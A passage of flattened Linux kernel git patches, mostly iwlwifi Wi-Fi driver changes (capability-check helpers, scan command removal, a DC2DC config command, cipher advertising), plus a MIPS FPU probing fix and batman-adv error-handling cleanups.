(mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_LAR_SUPPORT); + fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_LAR_SUPPORT); return iwl_parse_nvm_data(mvm->trans->dev, mvm->cfg, hw, sw, calib, regulatory, mac_override, phy_sku, @@ -792,8 +792,8 @@ int iwl_mvm_init_mcc(struct iwl_mvm *mvm) char mcc[3]; if (mvm->cfg->device_family == IWL_DEVICE_FAMILY_8000) { - tlv_lar = mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_LAR_SUPPORT; + tlv_lar = fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_LAR_SUPPORT); nvm_lar = mvm->nvm_data->lar_enabled; if (tlv_lar != nvm_lar) IWL_INFO(mvm, diff --git a/drivers/net/wireless/iwlwifi/mvm/rs.c b/drivers/net/wireless/iwlwifi/mvm/rs.c index ae9965647771..daff1d0a8e4a 100644 --- a/drivers/net/wireless/iwlwifi/mvm/rs.c +++ b/drivers/net/wireless/iwlwifi/mvm/rs.c @@ -1127,8 +1127,8 @@ void iwl_mvm_rs_tx_status(struct iwl_mvm *mvm, struct ieee80211_sta *sta, u32 tx_resp_hwrate = (uintptr_t)info->status.status_driver_data[1]; struct iwl_mvm_sta *mvmsta = iwl_mvm_sta_from_mac80211(sta); struct iwl_lq_sta *lq_sta = &mvmsta->lq_sta; - bool allow_ant_mismatch = mvm->fw->ucode_capa.api[0] & - IWL_UCODE_TLV_API_LQ_SS_PARAMS; + bool allow_ant_mismatch = fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_LQ_SS_PARAMS); /* Treat uninitialized rate scaling data same as non-existing. */ if (!lq_sta) { @@ -2714,7 +2714,7 @@ static void rs_vht_init(struct iwl_mvm *mvm, (vht_cap->cap & IEEE80211_VHT_CAP_RXSTBC_MASK)) lq_sta->stbc_capable = true; - if ((mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_BEAMFORMER) && + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_BEAMFORMER) && (num_of_ant(iwl_mvm_get_valid_tx_ant(mvm)) > 1) && (vht_cap->cap & IEEE80211_VHT_CAP_SU_BEAMFORMEE_CAPABLE)) lq_sta->bfer_capable = true; @@ -2998,7 +2998,7 @@ static void rs_build_rates_table(struct iwl_mvm *mvm, valid_tx_ant = iwl_mvm_get_valid_tx_ant(mvm); /* TODO: remove old API when min FW API hits 14 */ - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_LQ_SS_PARAMS) && + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_LQ_SS_PARAMS) && rs_stbc_allow(mvm, sta, lq_sta)) rate.stbc = true; @@ -3212,7 +3212,7 @@ static void rs_fill_lq_cmd(struct iwl_mvm *mvm, rs_build_rates_table(mvm, sta, lq_sta, initial_rate); - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_LQ_SS_PARAMS) + if (fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_LQ_SS_PARAMS)) rs_set_lq_ss_params(mvm, sta, lq_sta, initial_rate); mvmsta = iwl_mvm_sta_from_mac80211(sta); diff --git a/drivers/net/wireless/iwlwifi/mvm/rx.c b/drivers/net/wireless/iwlwifi/mvm/rx.c index d6314ddf57b5..8f1d93b7a13a 100644 --- a/drivers/net/wireless/iwlwifi/mvm/rx.c +++ b/drivers/net/wireless/iwlwifi/mvm/rx.c @@ -570,7 +570,7 @@ void iwl_mvm_handle_rx_statistics(struct iwl_mvm *mvm, }; u32 temperature; - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_STATS_V10) { + if (fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_STATS_V10)) { struct iwl_notif_statistics_v10 *stats = (void *)&pkt->data; if (iwl_rx_packet_payload_len(pkt) != v10_len) @@ -610,7 +610,7 @@ void iwl_mvm_handle_rx_statistics(struct iwl_mvm *mvm, /* Only handle rx statistics temperature changes if async temp * notifications are not supported */ - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_ASYNC_DTM)) + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_ASYNC_DTM)) iwl_mvm_tt_temp_changed(mvm, temperature); ieee80211_iterate_active_interfaces(mvm->hw, diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 794109e617a1..5de144968723 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -160,7 +160,7 @@ iwl_mvm_scan_rate_n_flags(struct iwl_mvm *mvm, enum ieee80211_band band, static u16 iwl_mvm_get_active_dwell(struct iwl_mvm *mvm, enum ieee80211_band band, int n_ssids) { - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BASIC_DWELL) + if (fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BASIC_DWELL)) return 10; if (band == IEEE80211_BAND_2GHZ) return 20 + 3 * (n_ssids + 1); @@ -170,7 +170,7 @@ static u16 iwl_mvm_get_active_dwell(struct iwl_mvm *mvm, static u16 iwl_mvm_get_passive_dwell(struct iwl_mvm *mvm, enum ieee80211_band band) { - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BASIC_DWELL) + if (fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_BASIC_DWELL)) return 110; return band == IEEE80211_BAND_2GHZ ? 100 + 20 : 100 + 10; } @@ -205,8 +205,9 @@ static void iwl_mvm_scan_calc_dwell(struct iwl_mvm *mvm, params->max_out_time = 120; if (iwl_mvm_low_latency(mvm)) { - if (mvm->fw->ucode_capa.api[0] & - IWL_UCODE_TLV_API_FRAGMENTED_SCAN) { + if (fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_FRAGMENTED_SCAN)) { + params->suspend_time = 105; /* * If there is more than one active interface make @@ -220,8 +221,9 @@ static void iwl_mvm_scan_calc_dwell(struct iwl_mvm *mvm, } } - if (frag_passive_dwell && (mvm->fw->ucode_capa.api[0] & - IWL_UCODE_TLV_API_FRAGMENTED_SCAN)) { + if (frag_passive_dwell && + fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_FRAGMENTED_SCAN)) { /* * P2P device scan should not be fragmented to avoid negative * impact on P2P device discovery. Configure max_out_time to be @@ -273,8 +275,8 @@ static void iwl_mvm_scan_calc_dwell(struct iwl_mvm *mvm, static inline bool iwl_mvm_rrm_scan_needed(struct iwl_mvm *mvm) { /* require rrm scan whenever the fw supports it */ - return mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT; + return fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_DS_PARAM_SET_IE_SUPPORT); } static int iwl_mvm_max_scan_ie_fw_cmd_room(struct iwl_mvm *mvm) @@ -732,7 +734,8 @@ iwl_mvm_build_scan_probe(struct iwl_mvm *mvm, struct ieee80211_vif *vif, static __le32 iwl_mvm_scan_priority(struct iwl_mvm *mvm, enum iwl_scan_priority_ext prio) { - if (mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY) + if (fw_has_api(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_API_EXT_SCAN_PRIORITY)) return cpu_to_le32(prio); if (prio <= IWL_SCAN_PRIORITY_EXT_2) @@ -785,7 +788,7 @@ static inline bool iwl_mvm_scan_use_ebs(struct iwl_mvm *mvm, return ((capa->flags & IWL_UCODE_TLV_FLAGS_EBS_SUPPORT) && mvm->last_ebs_successful && (n_iterations > 1 || - (capa->api[0] & IWL_UCODE_TLV_API_SINGLE_SCAN_EBS)) && + fw_has_api(capa, IWL_UCODE_TLV_API_SINGLE_SCAN_EBS)) && vif->type != NL80211_IFTYPE_P2P_DEVICE); } @@ -1233,7 +1236,7 @@ int iwl_mvm_reg_scan_start(struct iwl_mvm *mvm, struct ieee80211_vif *vif, iwl_mvm_build_scan_probe(mvm, vif, ies, ¶ms); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { hcmd.id = SCAN_REQ_UMAC; ret = iwl_mvm_scan_umac(mvm, vif, ¶ms, IWL_MVM_SCAN_REGULAR); @@ -1341,7 +1344,7 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm, iwl_mvm_build_scan_probe(mvm, vif, ies, ¶ms); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { hcmd.id = SCAN_REQ_UMAC; ret = iwl_mvm_scan_umac(mvm, vif, ¶ms, IWL_MVM_SCAN_SCHED); } else { @@ -1468,7 +1471,7 @@ static int iwl_mvm_scan_stop_wait(struct iwl_mvm *mvm, int type) IWL_DEBUG_SCAN(mvm, "Preparing to stop scan, type %x\n", type); - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) ret = iwl_mvm_umac_scan_abort(mvm, type); else ret = iwl_mvm_lmac_scan_abort(mvm); @@ -1486,7 +1489,7 @@ static int iwl_mvm_scan_stop_wait(struct iwl_mvm *mvm, int type) int iwl_mvm_scan_size(struct iwl_mvm *mvm) { - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) return sizeof(struct iwl_scan_req_umac) + sizeof(struct iwl_scan_channel_cfg_umac) * mvm->fw->ucode_capa.n_scan_channels + @@ -1504,7 +1507,7 @@ int iwl_mvm_scan_size(struct iwl_mvm *mvm) */ void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) { - if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { + if (fw_has_capa(&mvm->fw->ucode_capa, IWL_UCODE_TLV_CAPA_UMAC_SCAN)) { int uid, i; uid = iwl_mvm_scan_uid_by_status(mvm, IWL_MVM_SCAN_REGULAR); diff --git a/drivers/net/wireless/iwlwifi/mvm/tx.c b/drivers/net/wireless/iwlwifi/mvm/tx.c index 57e0cbb35f37..7ba7a118ff5c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/tx.c +++ b/drivers/net/wireless/iwlwifi/mvm/tx.c @@ -171,8 +171,8 @@ void iwl_mvm_set_tx_cmd(struct iwl_mvm *mvm, struct sk_buff *skb, !is_multicast_ether_addr(ieee80211_get_DA(hdr))) tx_flags |= TX_CMD_FLG_PROT_REQUIRE; - if ((mvm->fw->ucode_capa.capa[0] & - IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT) && + if (fw_has_capa(&mvm->fw->ucode_capa, + IWL_UCODE_TLV_CAPA_TXPOWER_INSERTION_SUPPORT) && ieee80211_action_contains_tpc(skb)) tx_flags |= TX_CMD_FLG_WRITE_TX_POWER; diff --git a/drivers/net/wireless/iwlwifi/mvm/utils.c b/drivers/net/wireless/iwlwifi/mvm/utils.c index bc55a8b82db6..03f8e06dded7 100644 --- a/drivers/net/wireless/iwlwifi/mvm/utils.c +++ b/drivers/net/wireless/iwlwifi/mvm/utils.c @@ -584,7 +584,7 @@ void iwl_mvm_dump_nic_error_log(struct iwl_mvm *mvm) struct iwl_error_event_table table; u32 base; - if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_NEW_VERSION)) { + if (!fw_has_api(&mvm->fw->ucode_capa, IWL_UCODE_TLV_API_NEW_VERSION)) { iwl_mvm_dump_nic_error_log_old(mvm); return; } From 2b4737dd8176f3d384cb9f77353ffdf6de665d3c Mon Sep 17 00:00:00 2001 From: Matti Gottlieb Date: Sun, 31 May 2015 11:29:52 +0300 Subject: [PATCH 633/872] iwlwifi: mvm: Remove old scan commands The firmwares that used these commands is not supported anymore. Remove them. Signed-off-by: Matti Gottlieb Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/fw-api.h | 7 ------- drivers/net/wireless/iwlwifi/mvm/ops.c | 5 ----- 2 files changed, 12 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api.h b/drivers/net/wireless/iwlwifi/mvm/fw-api.h index 0ed7675eff31..7128379fb621 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api.h @@ -171,13 +171,6 @@ enum { /* Thermal Throttling*/ REPLY_THERMAL_MNG_BACKOFF = 0x7e, - /* Scanning */ - SCAN_REQUEST_CMD = 0x80, - SCAN_ABORT_CMD = 0x81, - SCAN_START_NOTIFICATION = 0x82, - SCAN_RESULTS_NOTIFICATION = 0x83, - SCAN_COMPLETE_NOTIFICATION = 0x84, - /* NVM */ NVM_ACCESS_CMD = 0x88, diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 91ca626704e3..2801f97990e6 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -281,11 +281,6 @@ static const char *const iwl_mvm_cmd_strings[REPLY_MAX] = { CMD(BINDING_CONTEXT_CMD), CMD(TIME_QUOTA_CMD), CMD(NON_QOS_TX_COUNTER_CMD), - CMD(SCAN_REQUEST_CMD), - CMD(SCAN_ABORT_CMD), - CMD(SCAN_START_NOTIFICATION), - CMD(SCAN_RESULTS_NOTIFICATION), - CMD(SCAN_COMPLETE_NOTIFICATION), CMD(NVM_ACCESS_CMD), CMD(PHY_CONFIGURATION_CMD), CMD(CALIB_RES_NOTIF_PHY_DB), From 0becb377805c4d060da895e0ce214cee619f1d76 Mon Sep 17 00:00:00 2001 From: Matti Gottlieb Date: Sun, 31 May 2015 09:18:30 +0300 Subject: [PATCH 634/872] iwlwifi: mvm: Add DC2DC_CONFIG_CMD (0x83) cmd & TLV Add DC2DC_CONFIG_CMD (0x83) cmd. Add IWL_UCODE_TLV_CAPA_DC2DC_CONFIG_SUPPORT tlv. The command allows the driver get & set the DCDC's frequency tune. (freq_tune is the divider that is used to calculate the actual DCDC's clock rate) The command always returns the current/updated frequency tune values of the DCDC. Signed-off-by: Matti Gottlieb Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 2 + drivers/net/wireless/iwlwifi/mvm/fw-api.h | 46 ++++++++++++++++++++++ drivers/net/wireless/iwlwifi/mvm/ops.c | 1 + 3 files changed, 49 insertions(+) diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index 7efd62908e61..a9b5ae4ebec0 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -297,6 +297,7 @@ typedef unsigned int __bitwise__ iwl_ucode_tlv_capa_t; * which also implies support for the scheduler configuration command * @IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH: supports TDLS channel switching * @IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT: supports Hot Spot Command + * @IWL_UCODE_TLV_CAPA_DC2DC_SUPPORT: supports DC2DC Command * @IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS: support radio and beacon statistics * @IWL_UCODE_TLV_CAPA_BT_COEX_PLCR: enabled BT Coex packet level co-running * @IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC: ucode supports LAR updates with different @@ -318,6 +319,7 @@ enum iwl_ucode_tlv_capa { IWL_UCODE_TLV_CAPA_DQA_SUPPORT = (__force iwl_ucode_tlv_capa_t)12, IWL_UCODE_TLV_CAPA_TDLS_CHANNEL_SWITCH = (__force iwl_ucode_tlv_capa_t)13, IWL_UCODE_TLV_CAPA_HOTSPOT_SUPPORT = (__force iwl_ucode_tlv_capa_t)18, + IWL_UCODE_TLV_CAPA_DC2DC_CONFIG_SUPPORT = (__force iwl_ucode_tlv_capa_t)19, IWL_UCODE_TLV_CAPA_RADIO_BEACON_STATS = (__force iwl_ucode_tlv_capa_t)22, IWL_UCODE_TLV_CAPA_BT_COEX_PLCR = (__force iwl_ucode_tlv_capa_t)28, IWL_UCODE_TLV_CAPA_LAR_MULTI_MCC = (__force iwl_ucode_tlv_capa_t)29, diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api.h b/drivers/net/wireless/iwlwifi/mvm/fw-api.h index 7128379fb621..16e9ef49397f 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api.h @@ -171,6 +171,9 @@ enum { /* Thermal Throttling*/ REPLY_THERMAL_MNG_BACKOFF = 0x7e, + /* Set/Get DC2DC frequency tune */ + DC2DC_CONFIG_CMD = 0x83, + /* NVM */ NVM_ACCESS_CMD = 0x88, @@ -1389,6 +1392,49 @@ struct iwl_mvm_marker { __le32 metadata[0]; } __packed; /* MARKER_API_S_VER_1 */ +/* + * enum iwl_dc2dc_config_id - flag ids + * + * Ids of dc2dc configuration flags + */ +enum iwl_dc2dc_config_id { + DCDC_LOW_POWER_MODE_MSK_SET = 0x1, /* not used */ + DCDC_FREQ_TUNE_SET = 0x2, +}; /* MARKER_ID_API_E_VER_1 */ + +/** + * struct iwl_dc2dc_config_cmd - configure dc2dc values + * + * (DC2DC_CONFIG_CMD = 0x83) + * + * Set/Get & configure dc2dc values. + * The command always returns the current dc2dc values. + * + * @flags: set/get dc2dc + * @enable_low_power_mode: not used. + * @dc2dc_freq_tune0: frequency divider - digital domain + * @dc2dc_freq_tune1: frequency divider - analog domain + */ +struct iwl_dc2dc_config_cmd { + __le32 flags; + __le32 enable_low_power_mode; /* not used */ + __le32 dc2dc_freq_tune0; + __le32 dc2dc_freq_tune1; +} __packed; /* DC2DC_CONFIG_CMD_API_S_VER_1 */ + +/** + * struct iwl_dc2dc_config_resp - response for iwl_dc2dc_config_cmd + * + * Current dc2dc values returned by the FW. + * + * @dc2dc_freq_tune0: frequency divider - digital domain + * @dc2dc_freq_tune1: frequency divider - analog domain + */ +struct iwl_dc2dc_config_resp { + __le32 dc2dc_freq_tune0; + __le32 dc2dc_freq_tune1; +} __packed; /* DC2DC_CONFIG_RESP_API_S_VER_1 */ + /*********************************** * Smart Fifo API ***********************************/ diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 2801f97990e6..e4fa50075ffd 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -281,6 +281,7 @@ static const char *const iwl_mvm_cmd_strings[REPLY_MAX] = { CMD(BINDING_CONTEXT_CMD), CMD(TIME_QUOTA_CMD), CMD(NON_QOS_TX_COUNTER_CMD), + CMD(DC2DC_CONFIG_CMD), CMD(NVM_ACCESS_CMD), CMD(PHY_CONFIGURATION_CMD), CMD(CALIB_RES_NOTIF_PHY_DB), From 42bbd6ecca5065debf99260923689ae52df7230d Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Wed, 3 Jun 2015 09:54:18 +0300 Subject: [PATCH 635/872] iwlwifi: bump the iwlmvm API number to 15 The driver is now ready to handle the -15.ucode. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-7000.c | 2 +- drivers/net/wireless/iwlwifi/iwl-8000.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-7000.c b/drivers/net/wireless/iwlwifi/iwl-7000.c index b40b385ee0df..cc35f796d406 100644 --- a/drivers/net/wireless/iwlwifi/iwl-7000.c +++ b/drivers/net/wireless/iwlwifi/iwl-7000.c @@ -69,7 +69,7 @@ #include "iwl-agn-hw.h" /* Highest firmware API version supported */ -#define IWL7260_UCODE_API_MAX 14 +#define IWL7260_UCODE_API_MAX 15 /* Oldest version we won't warn about */ #define IWL7260_UCODE_API_OK 12 diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index 5c08f7035b4f..72040cd0b979 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -69,7 +69,7 @@ #include "iwl-agn-hw.h" /* Highest firmware API version supported */ -#define IWL8000_UCODE_API_MAX 14 +#define IWL8000_UCODE_API_MAX 15 /* Oldest version we won't warn about */ #define IWL8000_UCODE_API_OK 12 From 5f4c02e2b8c9251c827abf87c4ead4496c67492a Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Wed, 20 May 2015 16:51:28 +0200 Subject: [PATCH 636/872] iwlwifi: mvm: advertise only HW-supported ciphers After the new ciphers CCMP-256 and GCMP-128/256 were implemented, wpa_supplicant could start negotiating them and use the software implementation. This, however, breaks D3 behaviour in the driver since it means that WoWLAN will not be possible. To avoid breaking that feature, advertise only ciphers that the hardware supports. Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 32 ++++++++++++++++----- drivers/net/wireless/iwlwifi/mvm/mvm.h | 2 ++ 2 files changed, 27 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index c46c69f2440f..08367fbc3bc4 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -415,6 +415,12 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) { struct ieee80211_hw *hw = mvm->hw; int num_mac, ret, i; + static const u32 mvm_ciphers[] = { + WLAN_CIPHER_SUITE_WEP40, + WLAN_CIPHER_SUITE_WEP104, + WLAN_CIPHER_SUITE_TKIP, + WLAN_CIPHER_SUITE_CCMP, + }; /* Tell mac80211 our characteristics */ hw->flags = IEEE80211_HW_SIGNAL_DBM | @@ -441,14 +447,32 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) hw->uapsd_queues = IWL_MVM_UAPSD_QUEUES; hw->uapsd_max_sp_len = IWL_UAPSD_MAX_SP; + BUILD_BUG_ON(ARRAY_SIZE(mvm->ciphers) < ARRAY_SIZE(mvm_ciphers) + 2); + memcpy(mvm->ciphers, mvm_ciphers, sizeof(mvm_ciphers)); + hw->wiphy->n_cipher_suites = ARRAY_SIZE(mvm_ciphers); + hw->wiphy->cipher_suites = mvm->ciphers; + /* * Enable 11w if advertised by firmware and software crypto * is not enabled (as the firmware will interpret some mgmt * packets, so enabling it with software crypto isn't safe) */ if (mvm->fw->ucode_capa.flags & IWL_UCODE_TLV_FLAGS_MFP && - !iwlwifi_mod_params.sw_crypto) + !iwlwifi_mod_params.sw_crypto) { hw->flags |= IEEE80211_HW_MFP_CAPABLE; + mvm->ciphers[hw->wiphy->n_cipher_suites] = + WLAN_CIPHER_SUITE_AES_CMAC; + hw->wiphy->n_cipher_suites++; + } + + /* currently FW API supports only one optional cipher scheme */ + if (mvm->fw->cs[0].cipher) { + mvm->hw->n_cipher_schemes = 1; + mvm->hw->cipher_schemes = &mvm->fw->cs[0]; + mvm->ciphers[hw->wiphy->n_cipher_suites] = + mvm->fw->cs[0].cipher; + hw->wiphy->n_cipher_suites++; + } hw->flags |= IEEE80211_SINGLE_HW_SCAN_ON_ALL_BANDS; hw->wiphy->features |= @@ -574,12 +598,6 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) mvm->rts_threshold = IEEE80211_MAX_RTS_THRESHOLD; - /* currently FW API supports only one optional cipher scheme */ - if (mvm->fw->cs[0].cipher) { - mvm->hw->n_cipher_schemes = 1; - mvm->hw->cipher_schemes = &mvm->fw->cs[0]; - } - #ifdef CONFIG_PM_SLEEP if (iwl_mvm_is_d0i3_supported(mvm) && device_can_wakeup(mvm->trans->dev)) { diff --git a/drivers/net/wireless/iwlwifi/mvm/mvm.h b/drivers/net/wireless/iwlwifi/mvm/mvm.h index 255cde41d8b0..2d4bad5fe825 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mvm.h +++ b/drivers/net/wireless/iwlwifi/mvm/mvm.h @@ -820,6 +820,8 @@ struct iwl_mvm { } tdls_cs; struct iwl_mvm_shared_mem_cfg shared_mem_cfg; + + u32 ciphers[6]; }; /* Extract MVM priv from op_mode and _hw */ From 90b712ddabb40c49ca4f68bab07e27aa34c8d2a3 Mon Sep 17 00:00:00 2001 From: "Maciej W. Rozycki" Date: Tue, 2 Jun 2015 17:50:59 +0100 Subject: [PATCH 637/872] MIPS: Avoid an FPE exception in FCSR mask probing Use the default FCSR value in mask probing, avoiding an FPE exception where reset has left any exception enable and their corresponding cause bits set and the register is then rewritten with these bits active. Signed-off-by: Maciej W. Rozycki Cc: Joshua Kinard Cc: linux-mips@linux-mips.org Signed-off-by: Ralf Baechle --- arch/mips/kernel/cpu-probe.c | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/arch/mips/kernel/cpu-probe.c b/arch/mips/kernel/cpu-probe.c index e36515dcd3b2..209e5b76c1bc 100644 --- a/arch/mips/kernel/cpu-probe.c +++ b/arch/mips/kernel/cpu-probe.c @@ -74,13 +74,12 @@ static inline void cpu_set_fpu_fcsr_mask(struct cpuinfo_mips *c) { unsigned long sr, mask, fcsr, fcsr0, fcsr1; + fcsr = c->fpu_csr31; mask = FPU_CSR_ALL_X | FPU_CSR_ALL_E | FPU_CSR_ALL_S | FPU_CSR_RM; sr = read_c0_status(); __enable_fpu(FPU_AS_IS); - fcsr = read_32bit_cp1_register(CP1_STATUS); - fcsr0 = fcsr & mask; write_32bit_cp1_register(CP1_STATUS, fcsr0); fcsr0 = read_32bit_cp1_register(CP1_STATUS); From 940d156f52d27c16f3e0890e82974d500e40e64f Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:31 +0100 Subject: [PATCH 638/872] batman-adv: iv_ogm_aggregate_new, simplify error handling It is just a bit easier to put the error handling at one place and let multiple error paths use the same calls. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 28 +++++++++++++--------------- 1 file changed, 13 insertions(+), 15 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index c5ba7a798de7..190a64299090 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -642,19 +642,16 @@ static void batadv_iv_ogm_aggregate_new(const unsigned char *packet_buff, if (!batadv_atomic_dec_not_zero(&bat_priv->batman_queue_left)) { batadv_dbg(BATADV_DBG_BATMAN, bat_priv, "batman packet queue full\n"); - goto out; + goto out_free_outgoing; } } forw_packet_aggr = kmalloc(sizeof(*forw_packet_aggr), GFP_ATOMIC); - if (!forw_packet_aggr) { - if (!own_packet) - atomic_inc(&bat_priv->batman_queue_left); - goto out; - } + if (!forw_packet_aggr) + goto out_nomem; - if ((atomic_read(&bat_priv->aggregated_ogms)) && - (packet_len < BATADV_MAX_AGGREGATION_BYTES)) + if (atomic_read(&bat_priv->aggregated_ogms) && + packet_len < BATADV_MAX_AGGREGATION_BYTES) skb_size = BATADV_MAX_AGGREGATION_BYTES; else skb_size = packet_len; @@ -662,12 +659,8 @@ static void batadv_iv_ogm_aggregate_new(const unsigned char *packet_buff, skb_size += ETH_HLEN; forw_packet_aggr->skb = netdev_alloc_skb_ip_align(NULL, skb_size); - if (!forw_packet_aggr->skb) { - if (!own_packet) - atomic_inc(&bat_priv->batman_queue_left); - kfree(forw_packet_aggr); - goto out; - } + if (!forw_packet_aggr->skb) + goto out_free_forw_packet; forw_packet_aggr->skb->priority = TC_PRIO_CONTROL; skb_reserve(forw_packet_aggr->skb, ETH_HLEN); @@ -699,7 +692,12 @@ static void batadv_iv_ogm_aggregate_new(const unsigned char *packet_buff, send_time - jiffies); return; -out: +out_free_forw_packet: + kfree(forw_packet_aggr); +out_nomem: + if (!own_packet) + atomic_inc(&bat_priv->batman_queue_left); +out_free_outgoing: batadv_hardif_free_ref(if_outgoing); out_free_incoming: batadv_hardif_free_ref(if_incoming); From 564891510eb139dd073a0f1a5a7f5641b5bcc238 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:32 +0100 Subject: [PATCH 639/872] batman-adv: iv_ogm_queue_add, Simplify expressions Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 190a64299090..159f30af1dc3 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -750,13 +750,13 @@ static void batadv_iv_ogm_queue_add(struct batadv_priv *bat_priv, unsigned long max_aggregation_jiffies; batadv_ogm_packet = (struct batadv_ogm_packet *)packet_buff; - direct_link = batadv_ogm_packet->flags & BATADV_DIRECTLINK ? 